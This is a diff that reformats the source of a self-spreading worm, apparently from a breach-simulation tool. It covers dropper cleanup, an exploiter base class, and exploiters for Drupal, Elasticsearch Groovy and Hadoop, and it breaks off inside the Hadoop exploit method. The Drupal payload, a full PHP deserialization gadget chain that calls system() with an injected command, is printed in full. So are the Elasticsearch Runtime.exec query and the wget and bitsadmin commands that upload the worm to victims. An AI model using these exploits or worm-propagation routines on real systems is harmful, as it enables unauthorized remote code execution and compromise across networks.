if OperatingSystem.Windows == SystemInfoCollector.get_os():
|
if OperatingSystem.Windows == SystemInfoCollector.get_os():
|
||||||
monkey_cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': self._config['destination_path']} + monkey_options
|
monkey_cmdline = (
|
||||||
|
MONKEY_CMDLINE_WINDOWS % {"monkey_path": self._config["destination_path"]}
|
||||||
|
+ monkey_options
|
||||||
|
)
|
||||||
else:
|
else:
|
||||||
dest_path = self._config['destination_path']
|
dest_path = self._config["destination_path"]
|
||||||
# In linux we have a more complex commandline. There's a general outer one, and the inner one which actually
|
# In linux we have a more complex commandline. There's a general outer one, and the inner one which actually
|
||||||
# runs the monkey
|
# runs the monkey
|
||||||
inner_monkey_cmdline = MONKEY_CMDLINE_LINUX % {'monkey_filename': dest_path.split("/")[-1]} + monkey_options
|
inner_monkey_cmdline = (
|
||||||
monkey_cmdline = GENERAL_CMDLINE_LINUX % {'monkey_directory': dest_path[0:dest_path.rfind("/")],
|
MONKEY_CMDLINE_LINUX % {"monkey_filename": dest_path.split("/")[-1]}
|
||||||
'monkey_commandline': inner_monkey_cmdline}
|
+ monkey_options
|
||||||
|
)
|
||||||
|
monkey_cmdline = GENERAL_CMDLINE_LINUX % {
|
||||||
|
"monkey_directory": dest_path[0 : dest_path.rfind("/")],
|
||||||
|
"monkey_commandline": inner_monkey_cmdline,
|
||||||
|
}
|
||||||
|
|
||||||
monkey_process = subprocess.Popen(monkey_cmdline, shell=True,
|
monkey_process = subprocess.Popen(
|
||||||
stdin=subprocess.PIPE,
|
monkey_cmdline,
|
||||||
stdout=subprocess.PIPE,
|
shell=True,
|
||||||
stderr=subprocess.PIPE,
|
stdin=subprocess.PIPE,
|
||||||
close_fds=True, creationflags=DETACHED_PROCESS)
|
stdout=subprocess.PIPE,
|
||||||
|
stderr=subprocess.PIPE,
|
||||||
|
close_fds=True,
|
||||||
|
creationflags=DETACHED_PROCESS,
|
||||||
|
)
|
||||||
|
|
||||||
LOG.info("Executed monkey process (PID=%d) with command line: %s",
|
LOG.info(
|
||||||
monkey_process.pid, monkey_cmdline)
|
"Executed monkey process (PID=%d) with command line: %s",
|
||||||
|
monkey_process.pid,
|
||||||
|
monkey_cmdline,
|
||||||
|
)
|
||||||
|
|
||||||
time.sleep(3)
|
time.sleep(3)
|
||||||
if monkey_process.poll() is not None:
|
if monkey_process.poll() is not None:
|
||||||
|
@ -150,25 +187,35 @@ class MonkeyDrops(object):
|
||||||
LOG.info("Cleaning up the dropper")
|
LOG.info("Cleaning up the dropper")
|
||||||
|
|
||||||
try:
|
try:
|
||||||
if (self._config['source_path'].lower() != self._config['destination_path'].lower()) and \
|
if (
|
||||||
os.path.exists(self._config['source_path']) and \
|
(self._config["source_path"].lower() != self._config["destination_path"].lower())
|
||||||
WormConfiguration.dropper_try_move_first:
|
and os.path.exists(self._config["source_path"])
|
||||||
|
and WormConfiguration.dropper_try_move_first
|
||||||
|
):
|
||||||
|
|
||||||
# try removing the file first
|
# try removing the file first
|
||||||
try:
|
try:
|
||||||
os.remove(self._config['source_path'])
|
os.remove(self._config["source_path"])
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.debug("Error removing source file '%s': %s", self._config['source_path'], exc)
|
LOG.debug(
|
||||||
|
"Error removing source file '%s': %s", self._config["source_path"], exc
|
||||||
|
)
|
||||||
|
|
||||||
# mark the file for removal on next boot
|
# mark the file for removal on next boot
|
||||||
dropper_source_path_ctypes = c_char_p(self._config['source_path'])
|
dropper_source_path_ctypes = c_char_p(self._config["source_path"])
|
||||||
if 0 == ctypes.windll.kernel32.MoveFileExA(dropper_source_path_ctypes, None,
|
if 0 == ctypes.windll.kernel32.MoveFileExA(
|
||||||
MOVEFILE_DELAY_UNTIL_REBOOT):
|
dropper_source_path_ctypes, None, MOVEFILE_DELAY_UNTIL_REBOOT
|
||||||
LOG.debug("Error marking source file '%s' for deletion on next boot (error %d)",
|
):
|
||||||
self._config['source_path'], ctypes.windll.kernel32.GetLastError())
|
LOG.debug(
|
||||||
|
"Error marking source file '%s' for deletion on next boot (error %d)",
|
||||||
|
self._config["source_path"],
|
||||||
|
ctypes.windll.kernel32.GetLastError(),
|
||||||
|
)
|
||||||
else:
|
else:
|
||||||
LOG.debug("Dropper source file '%s' is marked for deletion on next boot",
|
LOG.debug(
|
||||||
self._config['source_path'])
|
"Dropper source file '%s' is marked for deletion on next boot",
|
||||||
|
self._config["source_path"],
|
||||||
|
)
|
||||||
T1106Telem(ScanStatus.USED, UsageEnum.DROPPER_WINAPI).send()
|
T1106Telem(ScanStatus.USED, UsageEnum.DROPPER_WINAPI).send()
|
||||||
|
|
||||||
LOG.info("Dropper cleanup complete")
|
LOG.info("Dropper cleanup complete")
|
||||||
|
|
|
@ -8,7 +8,7 @@ from common.utils.exploit_enum import ExploitType
|
||||||
from infection_monkey.config import WormConfiguration
|
from infection_monkey.config import WormConfiguration
|
||||||
from infection_monkey.utils.plugins.plugin import Plugin
|
from infection_monkey.utils.plugins.plugin import Plugin
|
||||||
|
|
||||||
__author__ = 'itamar'
|
__author__ = "itamar"
|
||||||
|
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
@ -48,31 +48,42 @@ class HostExploiter(Plugin):
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
self._config = WormConfiguration
|
self._config = WormConfiguration
|
||||||
self.exploit_info = {'display_name': self._EXPLOITED_SERVICE,
|
self.exploit_info = {
|
||||||
'started': '',
|
"display_name": self._EXPLOITED_SERVICE,
|
||||||
'finished': '',
|
"started": "",
|
||||||
'vulnerable_urls': [],
|
"finished": "",
|
||||||
'vulnerable_ports': [],
|
"vulnerable_urls": [],
|
||||||
'executed_cmds': []}
|
"vulnerable_ports": [],
|
||||||
|
"executed_cmds": [],
|
||||||
|
}
|
||||||
self.exploit_attempts = []
|
self.exploit_attempts = []
|
||||||
self.host = host
|
self.host = host
|
||||||
|
|
||||||
def set_start_time(self):
|
def set_start_time(self):
|
||||||
self.exploit_info['started'] = datetime.now().isoformat()
|
self.exploit_info["started"] = datetime.now().isoformat()
|
||||||
|
|
||||||
def set_finish_time(self):
|
def set_finish_time(self):
|
||||||
self.exploit_info['finished'] = datetime.now().isoformat()
|
self.exploit_info["finished"] = datetime.now().isoformat()
|
||||||
|
|
||||||
def is_os_supported(self):
|
def is_os_supported(self):
|
||||||
return self.host.os.get('type') in self._TARGET_OS_TYPE
|
return self.host.os.get("type") in self._TARGET_OS_TYPE
|
||||||
|
|
||||||
def send_exploit_telemetry(self, result):
|
def send_exploit_telemetry(self, result):
|
||||||
from infection_monkey.telemetry.exploit_telem import ExploitTelem
|
from infection_monkey.telemetry.exploit_telem import ExploitTelem
|
||||||
|
|
||||||
ExploitTelem(self, result).send()
|
ExploitTelem(self, result).send()
|
||||||
|
|
||||||
def report_login_attempt(self, result, user, password='', lm_hash='', ntlm_hash='', ssh_key=''):
|
def report_login_attempt(self, result, user, password="", lm_hash="", ntlm_hash="", ssh_key=""):
|
||||||
self.exploit_attempts.append({'result': result, 'user': user, 'password': password,
|
self.exploit_attempts.append(
|
||||||
'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key})
|
{
|
||||||
|
"result": result,
|
||||||
|
"user": user,
|
||||||
|
"password": password,
|
||||||
|
"lm_hash": lm_hash,
|
||||||
|
"ntlm_hash": ntlm_hash,
|
||||||
|
"ssh_key": ssh_key,
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
def exploit_host(self):
|
def exploit_host(self):
|
||||||
self.pre_exploit()
|
self.pre_exploit()
|
||||||
|
@ -80,9 +91,9 @@ class HostExploiter(Plugin):
|
||||||
try:
|
try:
|
||||||
result = self._exploit_host()
|
result = self._exploit_host()
|
||||||
except FailedExploitationError as e:
|
except FailedExploitationError as e:
|
||||||
logger.debug(f'Exploiter failed: {e}.')
|
logger.debug(f"Exploiter failed: {e}.")
|
||||||
except Exception:
|
except Exception:
|
||||||
logger.error('Exception in exploit_host', exc_info=True)
|
logger.error("Exception in exploit_host", exc_info=True)
|
||||||
finally:
|
finally:
|
||||||
self.post_exploit()
|
self.post_exploit()
|
||||||
return result
|
return result
|
||||||
|
@ -98,10 +109,10 @@ class HostExploiter(Plugin):
|
||||||
raise NotImplementedError()
|
raise NotImplementedError()
|
||||||
|
|
||||||
def add_vuln_url(self, url):
|
def add_vuln_url(self, url):
|
||||||
self.exploit_info['vulnerable_urls'].append(url)
|
self.exploit_info["vulnerable_urls"].append(url)
|
||||||
|
|
||||||
def add_vuln_port(self, port):
|
def add_vuln_port(self, port):
|
||||||
self.exploit_info['vulnerable_ports'].append(port)
|
self.exploit_info["vulnerable_ports"].append(port)
|
||||||
|
|
||||||
def add_executed_cmd(self, cmd):
|
def add_executed_cmd(self, cmd):
|
||||||
"""
|
"""
|
||||||
|
@ -109,5 +120,4 @@ class HostExploiter(Plugin):
|
||||||
:param cmd: String of executed command. e.g. 'echo Example'
|
:param cmd: String of executed command. e.g. 'echo Example'
|
||||||
"""
|
"""
|
||||||
powershell = True if "powershell" in cmd.lower() else False
|
powershell = True if "powershell" in cmd.lower() else False
|
||||||
self.exploit_info['executed_cmds'].append(
|
self.exploit_info["executed_cmds"].append({"cmd": cmd, "powershell": powershell})
|
||||||
{'cmd': cmd, 'powershell': powershell})
|
|
||||||
|
|
|
@ -9,20 +9,19 @@ from urllib.parse import urljoin
|
||||||
|
|
||||||
import requests
|
import requests
|
||||||
|
|
||||||
from common.common_consts.timeouts import (LONG_REQUEST_TIMEOUT,
|
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
|
||||||
MEDIUM_REQUEST_TIMEOUT)
|
|
||||||
from common.network.network_utils import remove_port
|
from common.network.network_utils import remove_port
|
||||||
from infection_monkey.exploit.web_rce import WebRCE
|
from infection_monkey.exploit.web_rce import WebRCE
|
||||||
from infection_monkey.model import ID_STRING
|
from infection_monkey.model import ID_STRING
|
||||||
|
|
||||||
__author__ = 'Ophir Harpaz'
|
__author__ = "Ophir Harpaz"
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
class DrupalExploiter(WebRCE):
|
class DrupalExploiter(WebRCE):
|
||||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
_TARGET_OS_TYPE = ["linux", "windows"]
|
||||||
_EXPLOITED_SERVICE = 'Drupal Server'
|
_EXPLOITED_SERVICE = "Drupal Server"
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
super(DrupalExploiter, self).__init__(host)
|
super(DrupalExploiter, self).__init__(host)
|
||||||
|
@ -34,9 +33,11 @@ class DrupalExploiter(WebRCE):
|
||||||
:return: the Drupal exploit config
|
:return: the Drupal exploit config
|
||||||
"""
|
"""
|
||||||
exploit_config = super(DrupalExploiter, self).get_exploit_config()
|
exploit_config = super(DrupalExploiter, self).get_exploit_config()
|
||||||
exploit_config['url_extensions'] = ['node/', # In Linux, no path is added
|
exploit_config["url_extensions"] = [
|
||||||
'drupal/node/'] # However, Bitnami installations are under /drupal
|
"node/", # In Linux, no path is added
|
||||||
exploit_config['dropper'] = True
|
"drupal/node/",
|
||||||
|
] # However, Bitnami installations are under /drupal
|
||||||
|
exploit_config["dropper"] = True
|
||||||
return exploit_config
|
return exploit_config
|
||||||
|
|
||||||
def add_vulnerable_urls(self, potential_urls, stop_checking=False):
|
def add_vulnerable_urls(self, potential_urls, stop_checking=False):
|
||||||
|
@ -51,17 +52,19 @@ class DrupalExploiter(WebRCE):
|
||||||
try:
|
try:
|
||||||
node_ids = find_exploitbale_article_ids(url)
|
node_ids = find_exploitbale_article_ids(url)
|
||||||
if node_ids is None:
|
if node_ids is None:
|
||||||
LOG.info('Could not find a Drupal node to attack')
|
LOG.info("Could not find a Drupal node to attack")
|
||||||
continue
|
continue
|
||||||
for node_id in node_ids:
|
for node_id in node_ids:
|
||||||
node_url = urljoin(url, str(node_id))
|
node_url = urljoin(url, str(node_id))
|
||||||
if self.check_if_exploitable(node_url):
|
if self.check_if_exploitable(node_url):
|
||||||
self.add_vuln_url(url) # This is for report. Should be refactored in the future
|
self.add_vuln_url(
|
||||||
|
url
|
||||||
|
) # This is for report. Should be refactored in the future
|
||||||
self.vulnerable_urls.append(node_url)
|
self.vulnerable_urls.append(node_url)
|
||||||
if stop_checking:
|
if stop_checking:
|
||||||
break
|
break
|
||||||
except Exception as e: # We still don't know which errors to expect
|
except Exception as e: # We still don't know which errors to expect
|
||||||
LOG.error(f'url {url} failed in exploitability check: {e}')
|
LOG.error(f"url {url} failed in exploitability check: {e}")
|
||||||
if not self.vulnerable_urls:
|
if not self.vulnerable_urls:
|
||||||
LOG.info("No vulnerable urls found")
|
LOG.info("No vulnerable urls found")
|
||||||
|
|
||||||
|
@ -75,35 +78,39 @@ class DrupalExploiter(WebRCE):
|
||||||
"""
|
"""
|
||||||
payload = build_exploitability_check_payload(url)
|
payload = build_exploitability_check_payload(url)
|
||||||
|
|
||||||
response = requests.get(f'{url}?_format=hal_json', # noqa: DUO123
|
response = requests.get(
|
||||||
json=payload,
|
f"{url}?_format=hal_json", # noqa: DUO123
|
||||||
headers={"Content-Type": "application/hal+json"},
|
json=payload,
|
||||||
verify=False,
|
headers={"Content-Type": "application/hal+json"},
|
||||||
timeout=MEDIUM_REQUEST_TIMEOUT)
|
verify=False,
|
||||||
|
timeout=MEDIUM_REQUEST_TIMEOUT,
|
||||||
|
)
|
||||||
|
|
||||||
if is_response_cached(response):
|
if is_response_cached(response):
|
||||||
LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
|
LOG.info(f"Checking if node {url} is vuln returned cache HIT, ignoring")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
return 'INVALID_VALUE does not correspond to an entity on this site' in response.text
|
return "INVALID_VALUE does not correspond to an entity on this site" in response.text
|
||||||
|
|
||||||
def exploit(self, url, command):
|
def exploit(self, url, command):
|
||||||
# pad a easy search replace output:
|
# pad a easy search replace output:
|
||||||
cmd = f'echo {ID_STRING} && {command}'
|
cmd = f"echo {ID_STRING} && {command}"
|
||||||
base = remove_port(url)
|
base = remove_port(url)
|
||||||
payload = build_cmd_execution_payload(base, cmd)
|
payload = build_cmd_execution_payload(base, cmd)
|
||||||
|
|
||||||
r = requests.get(f'{url}?_format=hal_json', # noqa: DUO123
|
r = requests.get(
|
||||||
json=payload,
|
f"{url}?_format=hal_json", # noqa: DUO123
|
||||||
headers={"Content-Type": "application/hal+json"},
|
json=payload,
|
||||||
verify=False,
|
headers={"Content-Type": "application/hal+json"},
|
||||||
timeout=LONG_REQUEST_TIMEOUT)
|
verify=False,
|
||||||
|
timeout=LONG_REQUEST_TIMEOUT,
|
||||||
|
)
|
||||||
|
|
||||||
if is_response_cached(r):
|
if is_response_cached(r):
|
||||||
LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
|
LOG.info(f"Exploiting {url} returned cache HIT, may have failed")
|
||||||
|
|
||||||
if ID_STRING not in r.text:
|
if ID_STRING not in r.text:
|
||||||
LOG.warning('Command execution _may_ have failed')
|
LOG.warning("Command execution _may_ have failed")
|
||||||
|
|
||||||
result = r.text.split(ID_STRING)[-1]
|
result = r.text.split(ID_STRING)[-1]
|
||||||
return result
|
return result
|
||||||
|
@ -126,14 +133,16 @@ class DrupalExploiter(WebRCE):
|
||||||
num_available_urls = len(self.vulnerable_urls)
|
num_available_urls = len(self.vulnerable_urls)
|
||||||
result = num_available_urls >= num_urls_needed_for_full_exploit
|
result = num_available_urls >= num_urls_needed_for_full_exploit
|
||||||
if not result:
|
if not result:
|
||||||
LOG.info(f'{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a Drupal server '
|
LOG.info(
|
||||||
f'but only {num_available_urls} found')
|
f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a Drupal server "
|
||||||
|
f"but only {num_available_urls} found"
|
||||||
|
)
|
||||||
return result
|
return result
|
||||||
|
|
||||||
|
|
||||||
def is_response_cached(r: requests.Response) -> bool:
|
def is_response_cached(r: requests.Response) -> bool:
|
||||||
""" Check if a response had the cache header. """
|
""" Check if a response had the cache header. """
|
||||||
return 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT'
|
return "X-Drupal-Cache" in r.headers and r.headers["X-Drupal-Cache"] == "HIT"
|
||||||
|
|
||||||
|
|
||||||
def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100) -> set:
|
def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100) -> set:
|
||||||
|
@ -141,12 +150,12 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
|
||||||
articles = set()
|
articles = set()
|
||||||
while lower < upper:
|
while lower < upper:
|
||||||
node_url = urljoin(base_url, str(lower))
|
node_url = urljoin(base_url, str(lower))
|
||||||
response = requests.get(node_url,
|
response = requests.get(
|
||||||
verify=False,
|
node_url, verify=False, timeout=LONG_REQUEST_TIMEOUT
|
||||||
timeout=LONG_REQUEST_TIMEOUT) # noqa: DUO123
|
) # noqa: DUO123
|
||||||
if response.status_code == 200:
|
if response.status_code == 200:
|
||||||
if is_response_cached(response):
|
if is_response_cached(response):
|
||||||
LOG.info(f'Found a cached article at: {node_url}, skipping')
|
LOG.info(f"Found a cached article at: {node_url}, skipping")
|
||||||
else:
|
else:
|
||||||
articles.add(lower)
|
articles.add(lower)
|
||||||
lower += 1
|
lower += 1
|
||||||
|
@ -155,20 +164,10 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
|
||||||
|
|
||||||
def build_exploitability_check_payload(url):
|
def build_exploitability_check_payload(url):
|
||||||
payload = {
|
payload = {
|
||||||
"_links": {
|
"_links": {"type": {"href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
|
||||||
"type": {
|
"type": {"target_id": "article"},
|
||||||
"href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"
|
"title": {"value": "My Article"},
|
||||||
}
|
"body": {"value": ""},
|
||||||
},
|
|
||||||
"type": {
|
|
||||||
"target_id": "article"
|
|
||||||
},
|
|
||||||
"title": {
|
|
||||||
"value": "My Article"
|
|
||||||
},
|
|
||||||
"body": {
|
|
||||||
"value": ""
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
return payload
|
return payload
|
||||||
|
|
||||||
|
@ -178,21 +177,17 @@ def build_cmd_execution_payload(base, cmd):
|
||||||
"link": [
|
"link": [
|
||||||
{
|
{
|
||||||
"value": "link",
|
"value": "link",
|
||||||
"options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000"
|
"options": 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
|
||||||
"GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\""
|
'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"'
|
||||||
"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:"
|
'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:'
|
||||||
"{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";"
|
'{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";'
|
||||||
"s:|size|:\"|command|\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000"
|
's:|size|:"|command|";s:30:"\u0000GuzzleHttp\\HandlerStack\u0000'
|
||||||
"stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000"
|
'stack";a:1:{i:0;a:1:{i:0;s:6:"system";}}s:31:"\u0000'
|
||||||
"GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\""
|
'GuzzleHttp\\HandlerStack\u0000cached";b:0;}i:1;s:7:"'
|
||||||
"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
|
'resolve";}}s:9:"_fn_close";a:2:{i:0;r:4;i:1;s:7:"resolve";}}'
|
||||||
"".replace('|size|', str(len(cmd))).replace('|command|', cmd)
|
"".replace("|size|", str(len(cmd))).replace("|command|", cmd),
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
"_links": {
|
"_links": {"type": {"href": f"{urljoin(base, '/rest/type/shortcut/default')}"}},
|
||||||
"type": {
|
|
||||||
"href": f"{urljoin(base, '/rest/type/shortcut/default')}"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
return payload
|
return payload
|
||||||
|
|
|
@ -13,12 +13,18 @@ import requests
|
||||||
from common.common_consts.network_consts import ES_SERVICE
|
from common.common_consts.network_consts import ES_SERVICE
|
||||||
from common.utils.attack_utils import BITS_UPLOAD_STRING, ScanStatus
|
from common.utils.attack_utils import BITS_UPLOAD_STRING, ScanStatus
|
||||||
from infection_monkey.exploit.web_rce import WebRCE
|
from infection_monkey.exploit.web_rce import WebRCE
|
||||||
from infection_monkey.model import (BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, CMD_PREFIX, DOWNLOAD_TIMEOUT, ID_STRING,
|
from infection_monkey.model import (
|
||||||
WGET_HTTP_UPLOAD)
|
BITSADMIN_CMDLINE_HTTP,
|
||||||
|
CHECK_COMMAND,
|
||||||
|
CMD_PREFIX,
|
||||||
|
DOWNLOAD_TIMEOUT,
|
||||||
|
ID_STRING,
|
||||||
|
WGET_HTTP_UPLOAD,
|
||||||
|
)
|
||||||
from infection_monkey.network.elasticfinger import ES_PORT
|
from infection_monkey.network.elasticfinger import ES_PORT
|
||||||
from infection_monkey.telemetry.attack.t1197_telem import T1197Telem
|
from infection_monkey.telemetry.attack.t1197_telem import T1197Telem
|
||||||
|
|
||||||
__author__ = 'danielg, VakarisZ'
|
__author__ = "danielg, VakarisZ"
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
@ -26,21 +32,28 @@ LOG = logging.getLogger(__name__)
|
||||||
class ElasticGroovyExploiter(WebRCE):
|
class ElasticGroovyExploiter(WebRCE):
|
||||||
# attack URLs
|
# attack URLs
|
||||||
MONKEY_RESULT_FIELD = "monkey_result"
|
MONKEY_RESULT_FIELD = "monkey_result"
|
||||||
GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD
|
GENERIC_QUERY = (
|
||||||
JAVA_CMD = \
|
"""{"size":1, "script_fields":{"%s": {"script": "%%s"}}}""" % MONKEY_RESULT_FIELD
|
||||||
GENERIC_QUERY % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
|
)
|
||||||
|
JAVA_CMD = (
|
||||||
|
GENERIC_QUERY
|
||||||
|
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
|
||||||
|
)
|
||||||
|
|
||||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
_TARGET_OS_TYPE = ["linux", "windows"]
|
||||||
_EXPLOITED_SERVICE = 'Elastic search'
|
_EXPLOITED_SERVICE = "Elastic search"
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
super(ElasticGroovyExploiter, self).__init__(host)
|
super(ElasticGroovyExploiter, self).__init__(host)
|
||||||
|
|
||||||
def get_exploit_config(self):
|
def get_exploit_config(self):
|
||||||
exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
|
exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
|
||||||
exploit_config['dropper'] = True
|
exploit_config["dropper"] = True
|
||||||
exploit_config['url_extensions'] = ['_search?pretty']
|
exploit_config["url_extensions"] = ["_search?pretty"]
|
||||||
exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP}
|
exploit_config["upload_commands"] = {
|
||||||
|
"linux": WGET_HTTP_UPLOAD,
|
||||||
|
"windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
|
||||||
|
}
|
||||||
return exploit_config
|
return exploit_config
|
||||||
|
|
||||||
def get_open_service_ports(self, port_list, names):
|
def get_open_service_ports(self, port_list, names):
|
||||||
|
@ -56,7 +69,9 @@ class ElasticGroovyExploiter(WebRCE):
|
||||||
try:
|
try:
|
||||||
response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
|
response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
|
||||||
except requests.ReadTimeout:
|
except requests.ReadTimeout:
|
||||||
LOG.error("Elastic couldn't upload monkey, because server didn't respond to upload request.")
|
LOG.error(
|
||||||
|
"Elastic couldn't upload monkey, because server didn't respond to upload request."
|
||||||
|
)
|
||||||
return False
|
return False
|
||||||
result = self.get_results(response)
|
result = self.get_results(response)
|
||||||
if not result:
|
if not result:
|
||||||
|
@ -65,7 +80,7 @@ class ElasticGroovyExploiter(WebRCE):
|
||||||
|
|
||||||
def upload_monkey(self, url, commands=None):
|
def upload_monkey(self, url, commands=None):
|
||||||
result = super(ElasticGroovyExploiter, self).upload_monkey(url, commands)
|
result = super(ElasticGroovyExploiter, self).upload_monkey(url, commands)
|
||||||
if 'windows' in self.host.os['type'] and result:
|
if "windows" in self.host.os["type"] and result:
|
||||||
T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send()
|
T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send()
|
||||||
return result
|
return result
|
||||||
|
|
||||||
|
@ -76,14 +91,14 @@ class ElasticGroovyExploiter(WebRCE):
|
||||||
"""
|
"""
|
||||||
try:
|
try:
|
||||||
json_resp = json.loads(response.text)
|
json_resp = json.loads(response.text)
|
||||||
return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD]
|
return json_resp["hits"]["hits"][0]["fields"][self.MONKEY_RESULT_FIELD]
|
||||||
except (KeyError, IndexError):
|
except (KeyError, IndexError):
|
||||||
return None
|
return None
|
||||||
|
|
||||||
def check_if_exploitable(self, url):
|
def check_if_exploitable(self, url):
|
||||||
# Overridden web_rce method that adds CMD prefix for windows command
|
# Overridden web_rce method that adds CMD prefix for windows command
|
||||||
try:
|
try:
|
||||||
if 'windows' in self.host.os['type']:
|
if "windows" in self.host.os["type"]:
|
||||||
resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND)
|
resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND)
|
||||||
else:
|
else:
|
||||||
resp = self.exploit(url, CHECK_COMMAND)
|
resp = self.exploit(url, CHECK_COMMAND)
|
||||||
|
|
|
@ -15,16 +15,21 @@ from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get
|
||||||
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
|
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
|
||||||
from infection_monkey.exploit.tools.http_tools import HTTPTools
|
from infection_monkey.exploit.tools.http_tools import HTTPTools
|
||||||
from infection_monkey.exploit.web_rce import WebRCE
|
from infection_monkey.exploit.web_rce import WebRCE
|
||||||
from infection_monkey.model import HADOOP_LINUX_COMMAND, HADOOP_WINDOWS_COMMAND, ID_STRING, MONKEY_ARG
|
from infection_monkey.model import (
|
||||||
|
HADOOP_LINUX_COMMAND,
|
||||||
|
HADOOP_WINDOWS_COMMAND,
|
||||||
|
ID_STRING,
|
||||||
|
MONKEY_ARG,
|
||||||
|
)
|
||||||
|
|
||||||
__author__ = 'VakarisZ'
|
__author__ = "VakarisZ"
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
class HadoopExploiter(WebRCE):
|
class HadoopExploiter(WebRCE):
|
||||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
_TARGET_OS_TYPE = ["linux", "windows"]
|
||||||
_EXPLOITED_SERVICE = 'Hadoop'
|
_EXPLOITED_SERVICE = "Hadoop"
|
||||||
HADOOP_PORTS = [["8088", False]]
|
HADOOP_PORTS = [["8088", False]]
|
||||||
# How long we have our http server open for downloads in seconds
|
# How long we have our http server open for downloads in seconds
|
||||||
DOWNLOAD_TIMEOUT = 60
|
DOWNLOAD_TIMEOUT = 60
|
||||||
|
@ -41,13 +46,13 @@ class HadoopExploiter(WebRCE):
|
||||||
if not self.vulnerable_urls:
|
if not self.vulnerable_urls:
|
||||||
return False
|
return False
|
||||||
# We presume hadoop works only on 64-bit machines
|
# We presume hadoop works only on 64-bit machines
|
||||||
if self.host.os['type'] == 'windows':
|
if self.host.os["type"] == "windows":
|
||||||
self.host.os['machine'] = '64'
|
self.host.os["machine"] = "64"
|
||||||
paths = self.get_monkey_paths()
|
paths = self.get_monkey_paths()
|
||||||
if not paths:
|
if not paths:
|
||||||
return False
|
return False
|
||||||
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths['src_path'])
|
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"])
|
||||||
command = self.build_command(paths['dest_path'], http_path)
|
command = self.build_command(paths["dest_path"], http_path)
|
||||||
if not self.exploit(self.vulnerable_urls[0], command):
|
if not self.exploit(self.vulnerable_urls[0], command):
|
||||||
return False
|
return False
|
||||||
http_thread.join(self.DOWNLOAD_TIMEOUT)
|
http_thread.join(self.DOWNLOAD_TIMEOUT)
|
||||||
|
@ -57,35 +62,47 @@ class HadoopExploiter(WebRCE):
|
||||||
|
|
||||||
def exploit(self, url, command):
|
def exploit(self, url, command):
|
||||||
